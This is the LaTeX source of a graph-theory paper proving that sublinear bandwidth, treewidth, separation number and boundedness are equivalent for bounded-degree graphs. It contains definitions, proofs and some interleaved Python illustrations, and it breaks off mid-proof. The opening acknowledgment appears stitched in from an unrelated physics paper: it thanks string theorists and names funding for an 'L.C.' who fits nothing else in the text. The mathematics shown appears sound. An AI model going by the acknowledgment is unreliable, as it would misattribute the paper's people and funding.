We would like to thank David Berenstein, Pablo C\'amara, Chris Hull, Josh Lapan, Vassilis Niarchos, Francesco Nitti, Carlos Nu\~nez, \'Angel Paredes, Boris Pioline, Cobi Sonnenschein
and Michele Trapletti for interesting and useful discussions. L.C. is supported by the Conseil r\'egional d'Ile de France, under convention
N$^{\circ}$F-08-1196/R and the Holcim Stiftung zur F\"orderung der wissenschaftlichen Fortbildung.
\section{Introduction}
There are a number of different parameters in graph theory which measure how well
a graph can be organised in a particular way, where the type of desired
arrangement is often motivated by geometrical properties, algorithmic
considerations, or specific applications. Well-known examples of such parameters
are the genus, the bandwidth, or the treewidth of a graph. The topic of this paper is
to discuss the relations between such parameters. We would like to determine how
they influence each other and what causes them to be large. To this end we will
mostly be interested in distinguishing between the cases when these parameters
are linear or sublinear in the number of vertices in the graph.
\medskip
We start with a few simple observations. Let $G=(V,E)$ be a graph on $n$
vertices. The \emph{bandwidth} of $G$ is denoted by $\bdw(G)$ and defined to be
the minimum positive integer $b$, such that there exists a labelling of the
vertices in $V$ by numbers $1,\dots,n$ so that the labels of every pair of
adjacent vertices differ by at most $b$. Clearly one reason for a graph to have
high bandwidth is vertices of high degree, since $\bdw(G)\ge
\lceil\Delta(G)/2\rceil$, where $\Delta(G)$ is the maximum degree of $G$. It is
also clear that not all graphs of bounded maximum degree have sublinear
bandwidth: Consider for example a random bipartite graph $G$ on $n$ vertices with
bounded maximum degree. Indeed, with high probability, $G$ does not have small
bandwidth since in any linear ordering of its vertices there will be an edge
between the first $n/3$ and the last $n/3$ vertices in this ordering. The reason
behind this obstacle is that $G$ has good expansion properties (definitions and
exact statements are provided in Section~\ref{sec:results}). This implies that
graphs with sublinear bandwidth
cannot exhibit good expansion properties. One may ask whether the converse is
also true, i.e., whether the absence of big expanding subgraphs in bounded-degree
graphs must lead to small bandwidth. We will prove that this is indeed the case
via the existence of certain separators.
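The bandwidth of small graphs is easy to experiment with directly from the definition. The following brute-force sketch (an illustration of ours; the $O(n!)$ search is feasible only for tiny $n$) computes the bandwidth and confirms the lower bound $\bdw(G)\ge\lceil\Delta(G)/2\rceil$ on a star:

```python
from itertools import permutations

def bandwidth(n, edges):
    """Exact bandwidth: minimise, over all labellings of the vertices
    0..n-1, the maximum label difference along an edge."""
    return min(
        max(abs(lab[u] - lab[v]) for u, v in edges)
        for lab in permutations(range(n))
    )

# a path has bandwidth 1; the star K_{1,4} attains ceil(Delta/2) = 2
assert bandwidth(5, [(i, i + 1) for i in range(4)]) == 1
assert bandwidth(5, [(0, i) for i in range(1, 5)]) == 2
```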
In fact, we will show a more general theorem in Section~\ref{sec:results}
(Theorem~\ref{thm:main}) which proves that the concepts of sublinear bandwidth,
sublinear treewidth, bad expansion properties, and sublinear separators are
equivalent for graphs of bounded maximum degree. In order to prove this
theorem, we will establish quantitative relations between the parameters involved
(see Theorem~\ref{thm:sep-band}, Theorem~\ref{thm:bound-trw}, and
Proposition~\ref{prop:band-bound}).
\medskip
As a byproduct of these relations we obtain sublinear bandwidth bounds for
several graph classes (see Section~\ref{sec:appl}). Since planar graphs are known
to have small separators~\cite{LipTar} for example, we get the following
result: The bandwidth of a planar graph on~$n$ vertices with maximum degree at
most~$\Delta$ is bounded from above by $\bdw(G) \le \frac{15n}{\log_\Delta(n)}$.
This extends a result of Chung~\cite{Chu} who proved that any $n$-vertex tree $T$
with maximum degree $\Delta$ has bandwidth at most $5n/\log_\Delta(n)$. Similar
upper bounds can be formulated for graphs of any fixed genus and, more generally,
for any graph class defined by a set of forbidden minors (see
Section~\ref{subsec:separators}).
In Section~\ref{subsec:universal} we conclude by considering
applications of these results to the domain of universal graphs and derive
implications such as the following. If $n$ is sufficiently large then any
$n$-vertex graph with minimum degree slightly above $\frac34n$ contains every
planar $n$-vertex graphs with bounded maximum degree as a subgraph (cf.\
Corollary~\ref{cor:planar-univers}).
\section{Definitions and Results}
\label{sec:results}
In this section we formulate our main results which provide relations between
the bandwidth, the treewidth, the expansion properties, and separators
of bounded degree graphs.
We need some further definitions.
For a graph $G=(V,E)$ and disjoint vertex sets $A,B\subset V$ we
denote by $E(A,B)$ the set of edges with one vertex in $A$ and one vertex in
$B$ and by $e(A,B)$ the number of such edges.
Next, we will introduce the notions of \emph{tree
decomposition} and \emph{treewidth}. Roughly speaking, a tree decomposition
tries to arrange the vertices of a graph in a tree-like manner and the
treewidth measures how well this can be done.
\begin{definition}[treewidth]
A tree decomposition of a graph $G=(V,E)$ is a pair $\left(\{X_i: i\in
I\},\right.$ $\left.T=(I,F)\right)$ where $\{X_i: i \in I\}$ is a family of
subsets $X_i\subseteq V$ and $T = (I,F)$ is a tree such that the following holds:
\begin{enumerate}[label=\rm (\alph{*}),leftmargin=*,itemsep=0mm,parsep=0mm,topsep=2mm]
\item $\bigcup_{i \in I} X_i = V$,
\item for every edge $\{v,w\} \in E$ there exists $i \in I$ with $\{v,w\}
\subseteq X_i$,
\item for every $i,j,k \in I$ the following holds: if $j$ lies on the path
from $i$ to $k$ in $T$, then $X_i \cap X_k \subseteq X_j$.
\end{enumerate}
The width of $\left(\{X_i:i \in I\},T=(I,F)\right)$ is defined as
$\max_{i \in I} |X_i| -1$. The tree\-width $\trw(G)$ of $G$ is
the minimum width of a tree decomposition of $G$.
\end{definition}
It follows directly from the definition that $\trw(G)\le \bdw(G)$ for any
graph~$G$: if the vertices of $G$ are labelled by numbers $1,\dots,n$ such that
the labels of adjacent vertices differ by at most $b$, then $I:=[n-b]$,
$X_i:=\{i,\dots,i+b\}$ for $i\in I$ and $T:=(I,F)$ with $F:=\{\{i-1,i\}:2\le i
\le n-b\}$ define a tree decomposition of $G$ with width $b$.
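This construction is easy to make executable: given a labelling of bandwidth at most $b$ (written below as a vertex-indexed tuple of labels), the bags $X_i$ form a path decomposition whose three axioms can be checked directly. A sketch, with names of ours:

```python
def path_decomposition(lab, edges, b):
    """Bags X_i = {vertices with labels i..i+b} along a path; checks the
    three tree-decomposition axioms for a labelling of bandwidth <= b."""
    n = len(lab)
    assert all(abs(lab[u] - lab[v]) <= b for u, v in edges)
    inv = {lab[v]: v for v in range(n)}                 # label -> vertex
    bags = [frozenset(inv[j] for j in range(i, i + b + 1))
            for i in range(n - b)]
    assert set().union(*bags) == set(range(n))                     # (a)
    assert all(any({u, v} <= X for X in bags) for u, v in edges)   # (b)
    for v in range(n):                                             # (c)
        idx = [i for i, X in enumerate(bags) if v in X]
        assert idx == list(range(idx[0], idx[-1] + 1))
    return bags

# example: the 4-cycle with labelling (v0,v1,v3,v2) has bandwidth 2
c4 = [(0, 1), (1, 2), (2, 3), (3, 0)]
bags = path_decomposition((0, 1, 3, 2), c4, 2)
assert [sorted(X) for X in bags] == [[0, 1, 3], [1, 2, 3]]  # width 2
```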
A \emph{separator} in a graph is a small cut-set that splits the graph into
components of limited size.
\begin{definition}[separator, separation number]
Let $\tfrac12 \le \alpha < 1$ be a real number, $s\in\field{N}$ and $G=(V,E)$ a
graph.
A subset $S\subset V$ is said to be an $(s,\alpha)$-separator of $G$
if there exist subsets $A,B \subset V$ such that
\begin{enumerate}[label=\rm (\alph{*}),leftmargin=*,itemsep=0mm,parsep=0mm,topsep=2mm]
\item $V = A \dot\cup B \dot\cup S$,
\item $|S| \leq s$, $|A|, |B| \leq \alpha |V|$, and
\item $E(A,B) = \emptyset$.
\end{enumerate}
We also say that $S$ separates $G$ into $A$ and $B$.
The separation number $\s(G)$ of $G$ is the smallest $s$ such that all
subgraphs $G'$ of $G$ have an $(s,2/3)$-separator.
\end{definition}
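As a quick illustration (not part of the argument below), the separator conditions can be verified computationally; e.g.\ the middle column of a $k\times k$ grid is a $(k,2/3)$-separator, in line with the planar separator theorem invoked later. A sketch of ours, using a greedy grouping of the components of $G-S$ into the sides $A$ and $B$ (sufficient here, though grouping components is in general a bin-packing question):

```python
from collections import defaultdict

def is_separator(vertices, edges, S, alpha=2/3):
    """Check that S separates G into sides A, B with no A-B edges and
    |A|, |B| <= alpha|V|, by greedily grouping the components of G - S."""
    S = set(S)
    adj = defaultdict(set)
    for u, v in edges:
        adj[u].add(v)
        adj[v].add(u)
    seen, comps = set(), []
    for v in vertices:
        if v in S or v in seen:
            continue
        stack, comp = [v], set()
        while stack:                       # DFS inside G - S
            w = stack.pop()
            if w in seen:
                continue
            seen.add(w)
            comp.add(w)
            stack.extend(adj[w] - S - seen)
        comps.append(comp)
    A, B = set(), set()                    # greedy balancing of components
    for comp in sorted(comps, key=len, reverse=True):
        (A if len(A) <= len(B) else B).update(comp)
    return max(len(A), len(B)) <= alpha * len(vertices)

k = 5
vs = [(i, j) for i in range(k) for j in range(k)]
es = [((i, j), (i + 1, j)) for i in range(k - 1) for j in range(k)] + \
     [((i, j), (i, j + 1)) for i in range(k) for j in range(k - 1)]
assert is_separator(vs, es, [(i, k // 2) for i in range(k)])  # |S| = sqrt(n)
assert not is_separator(vs, es, [(0, 0)])                     # a corner is not
```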
A vertex set is said to be expanding if it has many external neighbours.
We call a graph \emph{bounded} if every sufficiently large subgraph
contains a subset which is not expanding.
\begin{definition}[expander, bounded]
Let $\eps>0$ be a real number, $b\in\field{N}$ and
consider graphs $G=(V,E)$ and $G'=(V',E')$.
We say that $G'$ is an $\eps$-expander if all subsets $U\subset
V'$ with $|U|\le |V'|/2$ fulfil $|N(U)|\ge \eps |U|$. (Here $N(U)$ is
the set of neighbours of vertices in $U$ that lie outside of $U$.)
The graph $G$ is called $(b,\eps)$-bounded, if no subgraph $G'\subset
G$ with $|V'| \ge b$ vertices is an $\eps$-expander.
Finally, we define the $\eps$-boundedness $\bdd(G)$ of $G$ to be the minimum
$b$ for which $G$ is $(b+1,\eps)$-bounded.
\end{definition}
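The expansion of a small graph can be checked exhaustively (exponential in $|V|$, so an illustration only): a complete graph is a $1$-expander, while a long path has poor expansion, as a prefix of half its vertices has a single external neighbour. A sketch:

```python
from itertools import combinations

def expansion(n, edges):
    """min |N(U)|/|U| over nonempty U with |U| <= n/2 (brute force)."""
    adj = {v: set() for v in range(n)}
    for u, v in edges:
        adj[u].add(v)
        adj[v].add(u)
    best = float('inf')
    for k in range(1, n // 2 + 1):
        for U in combinations(range(n), k):
            N = set().union(*(adj[u] for u in U)) - set(U)
            best = min(best, len(N) / k)
    return best

assert expansion(6, [(u, v) for u in range(6) for v in range(u + 1, 6)]) == 1.0  # K_6
assert expansion(8, [(i, i + 1) for i in range(7)]) == 0.25                      # path P_8
```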
There is a wealth of literature on expander graphs (see,
e.g., \cite{HooLinWig}). In particular, it is known that for example
(bipartite) random graphs with bounded maximum degree form a family of
$\eps$-expanders. We also loosely say that such graphs
have~\emph{good expansion properties}.
\medskip
As indicated earlier, our aim is to provide relations between the
parameters we defined above. A well known example of a result of this type is
the following theorem due to Robertson and Seymour which relates the
treewidth and the separation number of a graph.\footnote{In fact, their result
states that any graph $G$ has a $(\trw(G)+1,1/2)$-separator, and does not talk
about subgraphs of $G$. But since every
subgraph of $G$ has treewidth at most $\trw(G)$, it thus also has a
$(\trw(G)+1,1/2)$-separator and the result, as stated here, follows.}
\begin{theorem}[treewidth$\to$separator, \cite{RobSey_minors5}]
\label{thm:trw-sep}
All graphs $G$ have separation number
\begin{equation*}
\s(G) \le \trw(G)+1.
\end{equation*}
\end{theorem}
This theorem states that graphs with small treewidth have small separators.
By repeatedly extracting separators, one can show that (a
qualitatively different version of) the converse also holds:
$\trw(G)\le\mathcal{O}(\s(G)\log n)$ for a graph $G$ on $n$ vertices (see,
e.g., \cite[Theorem 20]{Bod}). In this paper, we use a similar but more
involved argument to establish the following relation between the
separation number and the bandwidth of graphs with bounded maximum degree.
\begin{theorem}[separator$\to$bandwidth]
\label{thm:sep-band}
For each~$\Delta\ge 2$ every graph $G$ on $n$ vertices with maximum degree
$\Delta(G) \le \Delta$ has bandwidth
\begin{equation*}
\bdw(G) \le \frac{6n}{\log_{\Delta} (n/\s(G))}.
\end{equation*}
\end{theorem}
The proof of this theorem is provided in Section~\ref{sec:sep-band}.
Observe that Theorems~\ref{thm:trw-sep} and~\ref{thm:sep-band} together with the
obvious inequality $\trw(G)\le \bdw(G)$ tie the concepts of treewidth, bandwidth,
and separation number well together.
Apart from the somewhat negative statement of \emph{not having} a small separator,
what can we say about a graph with large tree- or bandwidth?
The next theorem states that such a graph must contain a big expander.
\begin{theorem}[bounded$\to$treewidth]
\label{thm:bound-trw}
Let $\eps > 0$ be constant. All graphs $G$ on $n$ vertices have treewidth
$\trw(G) \le 2\bdd(G) + 2\eps n$.
\end{theorem}
A result with similar implications was recently proved by Grohe and Marx
in~\cite{GroMar}. It shows that $b_{\eps}(G) < \eps n$ implies $\trw(G) \le 2\eps
n$.
For the sake of being self-contained we present our (short) proof of
Theorem~\ref{thm:bound-trw} in Section~\ref{sec:bound}. In addition, it is not
difficult to see that conversely the boundedness of a graph can be estimated via
its bandwidth -- which we prove in Section~\ref{sec:bound}, too.
\begin{proposition}[bandwidth$\to$bounded]
\label{prop:band-bound}
Let $\eps>0$ be constant. All graphs $G$ on $n$ vertices have $\bdd(G)\le 2
\bdw(G)/\eps$.
\end{proposition}
A qualitative consequence summarising the four results above is given in the following theorem. It states that if one
of the parameters bandwidth, treewidth, separation number, or boundedness is
sublinear for a family of bounded degree graphs, then so are the others.
\begin{theorem}[sublinear equivalence theorem]
\label{thm:main}
Let $\Delta$ be an arbitrary but fixed positive integer and consider a
hereditary class of graphs $\mbox{${ \mathcal C }$}$ such that all graphs in $\mbox{${ \mathcal C }$}$ have maximum
degree at most $\Delta$. Denote by $\mbox{${ \mathcal C }$}_n$ the set of those graphs in $\mbox{${ \mathcal C }$}$
with $n$ vertices. Then the following four properties are equivalent:
\begin{enumerate}[label=\rm (\arabic{*}),leftmargin=*,itemsep=0mm,parsep=0mm,topsep=2mm]
\item\label{it:main:1}
For all $\beta_1>0$ there is $n_1$ s.t. $\trw(G)\le\beta_1 n$ for all
$G\in\mbox{${ \mathcal C }$}_n$ with $n\ge n_1$.
\item\label{it:main:2}
For all $\beta_2>0$ there is $n_2$ s.t. $\bdw(G)\le\beta_2 n$ for all
$G\in\mbox{${ \mathcal C }$}_n$ with $n\ge n_2$.
\item\label{it:main:3}
For all $\beta_3,\eps>0$ there is $n_3$ s.t. $\bdd(G)\le\beta_3 n$ for all
$G\in\mbox{${ \mathcal C }$}_n$ with $n\ge n_3$.
\item\label{it:main:4}
For all $\beta_4>0$ there is $n_4$ s.t. $\s(G)\le\beta_4 n$ for all
$G\in\mbox{${ \mathcal C }$}_n$ with $n\ge n_4$.
\end{enumerate}
\end{theorem}
The paper is organized as follows. Section~\ref{sec:proofs} contains the proofs
of all the results mentioned so far: First we derive Theorem~\ref{thm:main}
from Theorems~\ref{thm:trw-sep}, \ref{thm:sep-band},
\ref{thm:bound-trw} and Proposition~\ref{prop:band-bound}. Then
Section~\ref{sec:sep-band} is devoted to the proof of
Theorem~\ref{thm:sep-band}, whereas Section~\ref{sec:bound} contains the proofs
of Theorem~\ref{thm:bound-trw} and Proposition~\ref{prop:band-bound}.
Finally, in Section~\ref{sec:appl}, we apply our results to deduce that certain
classes of graphs have sublinear bandwidth and can therefore be embedded as
spanning subgraphs into graphs of high minimum degree.
\section{Proofs}\label{sec:proofs}
\subsection{Proof of Theorem~\ref{thm:main}}
\begin{proof}
\ref{it:main:1}$\Rightarrow$\ref{it:main:4}:\quad
Given $\beta_4 > 0$ set $\beta_1\mathrel{\mathop:}=\beta_4/2$, let $n_1$ be the
constant from~\ref{it:main:1} for this $\beta_1$, and set $n_4 \mathrel{\mathop:}=
\max\{n_1,2/\beta_4\}$. Now consider $G\in\mbox{${ \mathcal C }$}_n$ with $n \ge n_4$. By
assumption we have $\trw(G)\le\beta_1 n$ and thus we can apply
Theorem~\ref{thm:trw-sep} to conclude that
$\s(G)\le\trw(G) + 1\le\beta_1 n + 1\le(\beta_4/2+1/n)n
\le \beta_4 n$.
\ref{it:main:4}$\Rightarrow$\ref{it:main:2}:\quad
Given $\beta_2 > 0$ let $d:=\max\{2,\Delta\}$, set $\beta_4\mathrel{\mathop:}=
d^{-6/\beta_2}$, get $n_4$ from~\ref{it:main:4} for this~$\beta_4$, and set
$n_2\mathrel{\mathop:}= n_4$. Let $G\in\mbox{${ \mathcal C }$}_n$ with $n \ge n_2$. We conclude
from~\ref{it:main:4} and Theorem~\ref{thm:sep-band} that
\begin{equation*}
\bdw(G)\le\frac{6n}{\log_{d}n-\log_{d}\s(G)}
\le\frac{6n}{\log_{d}n-\log_{d}(d^{-6/\beta_2}n)}
= \beta_2 n.
\end{equation*}
\ref{it:main:2}$\Rightarrow$\ref{it:main:3}:\quad
Given $\beta_3, \eps > 0$ set $\beta_2\mathrel{\mathop:}=\eps\beta_3/2$, get
$n_2$ from~\ref{it:main:2} for this $\beta_2$ and set $n_3\mathrel{\mathop:}= n_2$.
By~\ref{it:main:2} and Proposition~\ref{prop:band-bound} we get for
$G\in\mbox{${ \mathcal C }$}_n$ with $n \ge n_3$ that
$\bdd(G)\le2\bdw(G)/\eps\le2\beta_2n/\eps\le\beta_3 n$.
\ref{it:main:3}$\Rightarrow$\ref{it:main:1}:\quad
Given $\beta_1>0$, set $\beta_3\mathrel{\mathop:}=\beta_1/4$, $\eps\mathrel{\mathop:}=\beta_1/4$ and
get $n_3$ from~\ref{it:main:3} for this $\beta_3$ and $\eps$, and set
$n_1 \mathrel{\mathop:}= n_3$. Let $G\in\mbox{${ \mathcal C }$}_n$ with $n \ge n_1$.
Then~\ref{it:main:3} and Theorem~\ref{thm:bound-trw} imply
$\trw(G)\le2\bdd(G)+2\eps n\le2\beta_3n+2(\beta_1/4)n=\beta_1n$.
\end{proof}
\subsection{Separation and bandwidth}\label{sec:sep-band}
For the proof of Theorem~\ref{thm:sep-band} we will use the following
decomposition result which roughly states the following. If the removal of
a small separator $S$ decomposes the vertex set of a graph $G$ into relatively
small components $R_i\dot\cup P_i$ such that the vertices in $P_i$ form a ``buffer''
between the vertices in the separator $S$ and the set of remaining vertices
$R_i$ in the sense that $\dist_G(S,R_i)$ is sufficiently big,
then the bandwidth of $G$ is small.
\begin{lemma}[decomposition lemma]
\label{lem:decomposition}
Let $G=(V,E)$ be a graph and $S$, $P$, and $R$ be vertex sets
such that $V=S\dot\cup P\dot\cup R$. For $b,r\in\field{N}$ with $b\ge 3$ assume further that there are
decompositions $P=P_1\dot\cup\dots\dot\cup P_b$ and
$R=R_1\dot\cup\dots\dot\cup R_b$ of $P$ and $R$, respectively, such that the
following properties are satisfied:
\begin{enumerate}[label=\rm (\roman{*}),leftmargin=*,itemsep=0mm,parsep=0mm,topsep=2mm]
\item\label{it:dec:i} $|R_i|\le r$,
\item\label{it:dec:ii} $e(R_i\dot\cup P_i,R_j\dot\cup P_j)=0$ for all $1\le
i<j\le b$,
\item\label{it:dec:iii} $\dist_G(u,v)\ge \lfloor b/2\rfloor$ for all $u\in
S$ and $v\in R_i$ with $i\in[b]$.
\end{enumerate}
Then $\bdw(G)< 2(|S|+|P|+r)$.
\end{lemma}
\begin{proof}
Assume we have $G=(V,E)$, $V=S\dot\cup P\dot\cup R$ and $b,r \in \field{N}$ with the
properties stated above.
Our first goal is to partition $V$ into pairwise disjoint sets $B_1,\dots,B_b$,
which we call \emph{buckets}, and that satisfy the following property:
\begin{equation}\label{eq:dec:edges}
\text{If $\{u,v\}\in E$ for $u\in B_i$ and $v\in B_j$ then $|i-j|\le 1$.}
\end{equation}
To this end all vertices of $R_i$ are placed into bucket $B_i$ for each
$i \in [b]$ and the vertices of $S$ are placed into bucket $B_{\lceil
b/2\rceil}$. The remaining vertices from the sets $P_i$ are distributed over
the buckets according to their distance from $S$: vertex $v \in P_{i}$ is
assigned to bucket $B_{j(v)}$ where $j(v)\in [b]$ is defined by
\begin{equation}\label{eq:dec:jv}
j(v):=\begin{cases}
i & \text{ if } \dist(S,v) \ge |\lceil b/2\rceil-i|, \\
\lceil b/2\rceil - \dist(S,v) & \text{ if } \dist(S,v) < \lceil b/2\rceil-i,
\\ \lceil b/2\rceil + \dist(S,v) & \text{ if } \dist(S,v) <
i-\lceil b/2\rceil.
\end{cases}
\end{equation}
This placement obviously satisfies
\begin{equation}\label{eq:dec:B}
|B_i|\le|S|+|P|+|R_i|\le|S|+|P|+r
\end{equation}
by construction and condition~\ref{it:dec:i}.
Moreover, we claim that it guarantees condition~\eqref{eq:dec:edges}. Indeed, let $\{u,v\}\in E$
be an edge. If $u$ and $v$ are both in $S$ then clearly~\eqref{eq:dec:edges} is
satisfied. Thus it remains to consider the case where, without loss of
generality, $u\in R_i\dot\cup P_i$ for some $i\in [b]$. By condition~\ref{it:dec:ii} this
implies $v\in S\dot\cup R_i\dot\cup P_i$. First assume that $v\in S$. Thus
$\dist(u,S)=1$ and from condition~\ref{it:dec:iii} we infer that $u\in P_i$.
Accordingly $u$ is placed into bucket
$B_{j(u)}\in\{B_{\lceil b/2\rceil-1},B_{\lceil b/2\rceil},B_{\lceil
b/2\rceil+1}\}$ by~\eqref{eq:dec:jv} and $v$ is placed into
bucket~$B_{\lceil b/2\rceil}$ and so we also get~\eqref{eq:dec:edges} in this
case. If both $u,v\in R_i\dot\cup P_i$, on the other hand, we are clearly done if
$u,v\in R_i$. So assume without loss of generality, that $u\in P_i$. If $v\in
P_i$ then we conclude from $|\dist(S,u)-\dist(S,v)|\le 1$
and~\eqref{eq:dec:jv} that $u$ is placed into bucket $B_{j(u)}$ and $v$ into
$B_{j(v)}$ with $|j(u)-j(v)|\le 1$. If $v\in R_i$, finally, observe
that $|\dist(S,u)-\dist(S,v)|\le 1$ together with condition~\ref{it:dec:iii}
implies that $\dist(S,u)\ge \lfloor b/2\rfloor-1$ and so $u$ is placed into
bucket $B_{j(u)}$ with $|j(u)-i|\le 1$, where $i$ is the index such that $v\in B_i$,
by~\eqref{eq:dec:jv}.
Thus we also get~\eqref{eq:dec:edges} in this last case.
Now we are ready to construct an ordering of~$V$
respecting the desired bandwidth bound. We start with the vertices in bucket
$B_1$, order them arbitrarily, proceed to the vertices in bucket $B_2$, order
them arbitrarily, and so on, up to bucket $B_b$. By
condition~\eqref{eq:dec:edges} this gives an ordering with bandwidth at most
twice as large as the largest bucket and thus we conclude from~\eqref{eq:dec:B}
that $\bdw(G) < 2(|S|+|P|+r)$.
\end{proof}
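The final step above — ordering the vertices bucket by bucket and bounding the bandwidth by twice the size of the largest bucket — can be illustrated in Python. The sketch below uses BFS layers on a hypothetical $4\times 4$ grid graph as the buckets, since BFS layering automatically satisfies property~\eqref{eq:dec:edges}; it illustrates the counting argument, not the full $S,P_i,R_i$ construction:

```python
from collections import deque

def bfs_buckets(adj, root):
    """Partition vertices into BFS layers; edges only join layers i, j with |i-j| <= 1."""
    dist = {root: 0}
    q = deque([root])
    while q:
        v = q.popleft()
        for w in adj[v]:
            if w not in dist:
                dist[w] = dist[v] + 1
                q.append(w)
    buckets = {}
    for v, d in dist.items():
        buckets.setdefault(d, []).append(v)
    return [buckets[d] for d in sorted(buckets)]

# 4x4 grid graph
V = [(x, y) for x in range(4) for y in range(4)]
adj = {v: [(v[0]+dx, v[1]+dy) for dx, dy in ((1,0),(-1,0),(0,1),(0,-1))
           if (v[0]+dx, v[1]+dy) in V] for v in V}

buckets = bfs_buckets(adj, (0, 0))
order = {v: i for i, v in enumerate(v for B in buckets for v in B)}
bandwidth = max(abs(order[u] - order[v]) for u in V for v in adj[u])
# the bucket-by-bucket ordering has bandwidth below twice the largest bucket
assert bandwidth < 2 * max(len(B) for B in buckets)
```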
A decomposition of the vertices of $G$ into buckets as in the proof of
Lemma~\ref{lem:decomposition} is also called a path partition of $G$ and
appears, e.g., in~\cite{DujSudWoo}.
Before we get to the proof of Theorem~\ref{thm:sep-band}, we will establish
the following technical observation about labelled trees.
\begin{proposition}\label{prop:tree}
Let~$b$ be a positive real,
$T=(V,E)$ be a tree with $|V|\ge 3$, and $\ell:V\to[0,1]$ be a real valued labelling of its
vertices such that $\sum_{v\in V}\ell(v)\le 1$.
Denote further for every $v\in V$ by $L(v)$ the set of leaves that
are adjacent to $v$ and suppose that $\ell(v)+\sum_{u\in L(v)}\ell(u)\ge|L(v)|/b$ for all $v\in V$.
Then $T$ has at most $b$ leaves in total.
\end{proposition}
\begin{proof}
Let $L\subset V$ be the set of leaves of $T$ and $I:=V\setminus L$ be the set
of internal vertices. Clearly
\begin{equation*}
1 \ge \sum_{v\in V}\ell(v)
=\sum_{v\in I}\left(\ell(v)+\sum_{u\in L(v)}\ell(u)\right)
\ge\sum_{v\in I}\frac{|L(v)|}{b}
=\frac{|L|}{b}
\end{equation*}
which implies the assertion.
\end{proof}
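The one-line computation above rests on the fact that, in a tree on at least three vertices, every leaf is adjacent to exactly one internal vertex, so the double sum counts each label exactly once. This can be checked mechanically on a small example (Python sketch; the tree and the labels are arbitrary):

```python
# A hypothetical tree on 7 vertices, given by its edge list.
edges = [(0, 1), (0, 2), (1, 3), (1, 4), (2, 5), (2, 6)]
adj = {}
for a, b in edges:
    adj.setdefault(a, []).append(b)
    adj.setdefault(b, []).append(a)

ell = {v: (v + 1) / 28 for v in adj}          # labels summing to 1
leaves = {v for v in adj if len(adj[v]) == 1}
internal = set(adj) - leaves

# sum over internal vertices of ell(v) + sum of labels of adjacent leaves
total = sum(ell[v] + sum(ell[u] for u in adj[v] if u in leaves)
            for v in internal)
assert abs(total - sum(ell.values())) < 1e-12
```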
The idea of the proof of Theorem~\ref{thm:sep-band} is to repeatedly extract
separators from~$G$ and the pieces that result from the removal of such
separators. We denote the union of these separators by $S$, put all remaining
vertices with small distance from $S$ into sets $P_i$, and all other
vertices into sets $R_i$. Then we can apply the decomposition lemma
(Lemma~\ref{lem:decomposition}) to these sets $S$, $P_i$, and $R_i$. This,
together with some technical calculations, will give the desired bandwidth bound
for~$G$.
\begin{proof}[of Theorem~\ref{thm:sep-band}] Let $G = (V,E)$ be a graph on $n$
vertices with maximum degree $\Delta\ge 2$.
Observe that the desired bandwidth bound is trivial if $\Delta=2$ or if
$\log_{\Delta} n -\log_{\Delta}\s(G)\le 6$, so assume in the following that
$\Delta \ge 3$ and $\log_{\Delta} n -\log_{\Delta}\s(G)>6$. Define
\begin{equation}\label{eq:sep-band:bt}
\beta:=\log_{\Delta} n -\log_{\Delta} \s(G)
\qquad\text{and}\qquad
b:=\left\lfloor\beta\right\rfloor \ge 6
\end{equation}
and observe that with this choice of $\beta$ our aim is to show that $\bdw(G)\le
6n/\beta$.
The goal is to construct a partition $V = S\dot\cup P \dot\cup R$ with the
properties required by Lemma~\ref{lem:decomposition}. For this
purpose we will recursively use the fact that $G$ and its subgraphs have separators of
size at most $\s(G)$.
In the $i$-th round we will identify separators $S_{i,k}$ in $G$ whose removal
splits $G$ into parts $V_{i,1},\dots,V_{i,b_i}$.
The details are as follows.
In the first round let $S_{1,1}$ be an arbitrary $(\s(G),2/3)$-separator in $G$
that separates $G$ into $V_{1,1}$ and $V_{1,2}$ and set
$b_1:=2$.
In the $i$-th round, $i>1$, consider each of the sets $V_{i-1,j}$ with
$j\in[b_{i-1}]$. If $|V_{i-1,j}|\le 2n/b$ then let
$V_{i,j'}:=V_{i-1,j}$, otherwise choose an $(\s(G),2/3)$-separator $S_{i,k}$
that separates $G[V_{i-1,j}]$ into sets $V_{i,j'}$ and $V_{i,j'+1}$ (where $k$
and $j'$ are appropriate indices, for simplicity we do not specify
them further). Let $S_i$ denote the union of all separators
constructed in this way (and in this round).
This finishes the $i$-th round. We stop this procedure as soon as all sets
$V_{i,j'}$ have size at most $2n/b$ and denote the corresponding $i$ by
$i^*$. Then $b_{i^*}$ is the number of sets $V_{i^*,j'}$ we end up with in the
last iteration. Let further $x_S$ be the number of separators $S_{i,k}$
extracted from~$G$ during this process in total.
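The recursive extraction just described can be sketched in Python. The separator oracle below is hypothetical and works only for path graphs (the median vertex of an interval is a $(1,2/3)$-separator); the assertions check the counts $b_{i^*}\le b$ and $x_S=b_{i^*}-1$ claimed below on this example:

```python
def split_path(part):
    """(1, 2/3)-separator for an interval of path vertices: the median vertex."""
    m = len(part) // 2
    return [part[m]], part[:m], part[m+1:]

def extract(part, limit, seps, parts):
    # stop splitting once the piece has at most 2n/b vertices
    if len(part) <= limit:
        parts.append(part)
        return
    S, left, right = split_path(part)
    seps.append(S)
    extract(left, limit, seps, parts)
    extract(right, limit, seps, parts)

n, b = 100, 6
seps, parts = [], []
extract(list(range(n)), 2 * n / b, seps, parts)
assert all(len(p) <= 2 * n / b for p in parts)
assert len(parts) <= b                  # b_{i*} <= b
assert len(seps) == len(parts) - 1      # x_S = b_{i*} - 1 <= b - 1
```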
\begin{claim}\label{cl:sep-band}
We have $b_{i^*}\le b$ and $x_S\le b-1$.
\end{claim}
We will postpone the proof of this fact and first show how it implies the
theorem.
Set $S:=\bigcup_{i\in[i^*]}S_i$, for $j\in[b_{i^*}]$ define
\begin{equation*}
P_j:=\{v \in V_{i^*,j} : \dist(v,S) < \lfloor b/2\rfloor\}
\qquad\text{and}\qquad R_j\mathrel{\mathop:}= V_{i^*,j} \setminus P_j,
\end{equation*}
set $P_j=R_j=\emptyset$ for $b_{i^*}<j\le b$ and finally define
$P:=\bigcup_{j\in[b]} P_j$ and $R:=\bigcup_{j\in[b]} R_j$.
We claim that $V=S\dot\cup P\dot\cup R$ is a partition that satisfies the requirements
of the decomposition lemma (Lemma~\ref{lem:decomposition}) with parameter~$b$
and~$r=2n/b$. To check this, observe first that for all $i\in[i^*]$ and
$j,j'\in[b_i]$ we have $e(V_{i,j},V_{i,j'})=0$ since $V_{i,j}$ and $V_{i,j'}$
were separated by some $S_{i',k}$. It follows that $e(R_j\dot\cup P_j,R_{j'}\dot\cup
